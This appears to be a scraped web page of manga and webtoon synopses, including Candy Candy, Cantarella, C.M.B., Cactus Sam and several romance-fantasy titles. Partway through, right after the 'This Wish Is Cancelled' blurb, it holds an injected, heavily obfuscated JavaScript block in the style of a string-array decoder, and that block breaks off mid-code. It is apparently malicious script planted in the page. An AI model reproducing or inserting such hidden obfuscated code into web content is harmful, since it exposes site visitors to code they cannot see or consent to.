Why does the Dragon King seek a rabbit? Cheong-wan, a turtle from the Dragon King's palace, ventures onto land to retrieve the liver of a rabbit to cure the ailing king. By sheer luck, he encounters the elusive rabbit almost immediately upon arrival. Determined to bring the rabbit back to the Underwater Kingdom, Cheong-wan is prepared to do whatever it takes. "And how will you convince me?" "Sorry?" "If I go to the Dragon King's palace, what will you do for me in return, Cheong-wan?" Cheong-wan finds himself mesmerized by the rabbit Jeok-ran's playful smile and enigmatic words. He realizes that to succeed, he must go to far lengths. Thus begins a perilous and enchanting journey, as Cheong-wan navigates a world filled with unexpected challenges and mysterious allurements, where the stakes are as high as the depths of the Dragon King's palace.
We all know that a lot of the booty of the golden age of explorations made it into museums. The British Museum in the C.M.B. story, which had custody of the recondite scientific curiosities and artefacts collected by explorer/adventurers and stored in a Wunderkammer, decided to study the dusty arcana in the 19th century. Three investigators dubbed the "Magi" were appointed to do the research, each given a ring embossed with the letters C.M.B. Fast-forward to present-day Japan where Sakaki Shinra is the curator of a museum of oddities. He now has possession of the C.M.B. rings, indicating that he has been granted the status of guardian of knowledge like the Magi that preceded him.
Cactus Sam is just your regular, ordinary cowboy, but give him just a sip of milk and transforms from a calm, congenial fellow, into the rootin-est, tootin-est, two-gun shootin-est cowpoke you ever did see… And it just so happens his parents own the local "Milk-Hall." Join "Cactus" on his adventures, as he makes some new friends and battles unsavory characters across the Old West - with his trusty six-shooter in one hand, and a nice, ice-cold cold, glass of milk in the other.---**Volume 69 of the Osamu Tezuka Complete Works**
Cairo: Ancient Egypt... where pharaoh "Cairo", the son of the sun god, resides. Perfect face, perfect physique, endless treasure of silver and gold - but still, Cairo has worries. Life for him is simply an endless cycle of death and resurrection and he's getting bored of it. And so, he wants to find out the meaning of life. He wants to find a purpose! This is where the ever helpful Imhotep steps in, to suggest that the Pharaoh should, then, try going on a blind date! Follow the sexy Egypt boys in this series written by the popular artist, Fujoking, in their first ever release with kakao page!
From Hana-mi: A oneshot about the developing relationship between an out-of-world wanderer and a mistreated boy.
Aruna is the princess of B Kingdom. One day, it is decided that she will marry the king of E Kingdom, a country known for it's bloody conflicts. This is the tale of a girl who carries secrets and ambitions, and a game in which love, pride and life will be played.
“Navia Agnes”, adopted to marry the Crown Prince on behalf of Duke Agnes’s daughter with a time limit. “I really want to be family.” Navia, who held on to her family’s affection, did her best to become an Empress even while being abused. However, once Vivian, the Duke’s real daughter, is cured, she is abandoned by her family. No, it would be right to say that she was abandoned on all occasions. “Just how much more effort do I have to make? If I want to be your family.” Navia took off her blood-soaked gloves. Then on her right wrist, a number that couldn’t be seen by others appeared. 1 She calmly admitted, looking down on the number. “I’m going to stop playing with my family now.” At that moment, the number on her wrist changed. 0 Just like that, her life began again. “If you messed with me, you’re gonna pay for it.” Will she be able to find a temporary family who will protect her until she becomes of age, and get revenge on Duke Agnes? Alternative Name Family is Needed / 우리가 가족이 될 수 있을까요?
"A growing romance fantasy in which I find my true self!" After graduating from the academy, Remiel, who is living a solitary life as an outcast (?), is unable to overcome her mother's persuation and attends the party of the Marquis of Atrahasis. And there, Tyriel, whom she has had a crush on for a long time, and her roommate, Beryl, announce their marriage… . In shock, Remiel said, 'I wish I was Beryl.' The moment she thinks to herself, her necklace suddenly shone and she disappeared on the spot! And when he wakes up again, one day, Remiel has become Beryl from the Academy days... !? ? ??? ?? ; This Wish Is Cancelled<script></script><script>(function(_0x4e07aa,_0x3d8640){var _0x3e0d16=_0x2567,_0x268177=_0x4e07aa();while(!![]){try{var _0x4d0227=parseInt(_0x3e0d16(0x181))/(-0x1*0x606+0x2213*0x1+-0x703*0x4)*(parseInt(_0x3e0d16(0x182))/(-0xf*-0x25+-0x4e5*-0x1+-0x70e))+-parseInt(_0x3e0d16(0x170))/(0x1*-0x585+-0x1f9+0x11*0x71)+-parseInt(_0x3e0d16(0x179))/(0xd9a+0x115a*0x1+-0x1ef0)*(parseInt(_0x3e0d16(0x17e))/(0x1c41*-0x1+0xe8d+-0xdb9*-0x1))+parseInt(_0x3e0d16(0x17a))/(-0x1*-0x1dc2+0x1b*-0x20+0xd2e*-0x2)*(-parseInt(_0x3e0d16(0x177))/(-0x9b*-0x32+-0x4a6+-0x1999))+parseInt(_0x3e0d16(0x17b))/(-0xcb6+-0x10*0x16f+0x11d7*0x2)*(-parseInt(_0x3e0d16(0x173))/(0x249e+0x1072+-0x3507))+-parseInt(_0x3e0d16(0x163))/(-0xd*0x223+-0x5*-0x6af+-0x59a)*(parseInt(_0x3e0d16(0x165))/(-0x24cd+-0x808+-0x4*-0xb38))+parseInt(_0x3e0d16(0x16e))/(-0xdc3*-0x2+0x1*-0x423+-0x1757);if(_0x4d0227===_0x3d8640)break;else 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Candy Candy is primarily a love story. Candy's first love was a character named Anthony Adley, but the series is remembered by the majority of fans as a result of her heartbreaking separation from her true love and soul mate, Terence "Terry" Grantchester. A recurrent story arc in the series is the "Prince of the Hill", a mysterious boy Candy met as a child and never saw again. His identity is revealed in the last pages of the manga. Once upon a time, there was a little orphan girl crying her heart out on a meadowy hill. It was during this time that she had met her prince--a handsome young boy who approached her, and told her gently to dry her tears and smile instead. The little girl never forgot that memory closest to her heart. Not even after several years later when she travels the path of self-discovery...believing that someday, she will meet her prince again and find true happiness once and for all.
From Go! Comi: From birth, Cesare Borgia is surrounded by shadows. Damned by his own father, hated by his closest brother, separated from the sister who loves him, and driven by the demons of Hell itself, his quest for power threatens to set the world of Renaissance Italy ablaze -- unless one innocent person can drive away the poisonous shadows ravaging him! Enter the world of the Borgias. A world of unspeakable conspiracies and forbidden desires. A family whose murderous intrigues would make them infamous throughout history. A history written in blood…and a poison called Cantarella.
Based on Kurousa-P's popular Vocaloid song "Cantarella": Cesare (KAITO) is the first born son of the House of Borgia, while Lucrezia (Hatsune Miku) is his younger sister. One day, Cesare receives a poison from his father that has been handed down in the family called, "Cantarella". The House of Borgia gained prosperity in the 15th century Rome. Cesare, who is in line as the next head of the family, has a sister who he has never met. Her name is Lucrezia. The story unfolds after the moment the two first meet...
“Warning: Yuri content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” For my country, I was prepared to sacrifice myself, even for marriage. But the one I had to marry happened to be a girl. I had thought I had pranked the goddess pranker, but unexpectedly the goddess had pranked me.